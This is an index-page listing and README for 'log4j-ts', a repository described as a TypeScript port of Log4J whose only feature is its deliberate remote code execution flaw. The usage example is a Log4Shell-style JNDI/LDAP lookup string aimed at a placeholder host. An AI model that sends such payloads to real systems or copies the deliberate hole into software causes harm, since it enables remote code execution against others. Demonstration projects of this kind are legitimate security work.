An open API service indexing awesome lists of open source software.

https://github.com/matteopolak/log4j-ts

This repository is a port of the Log4J library whose only feature is the RCE vulnerability
https://github.com/matteopolak/log4j-ts

Last synced: 27 days ago
JSON representation

This repository is a port of the Log4J library whose only feature is the RCE vulnerability

Awesome Lists containing this project

README

        

# log4j-ts
This repository is a port of the Log4J library whose only feature is the RCE vulnerability

## Disclaimer
### Do not use this library for any serious purposes. It deliberately contains RCE (Remote Code Execution).

## Installation
```console
> yarn install
```

## Usage
```console
> npm start -- "${jndi:ldap(s)://example.com}"
```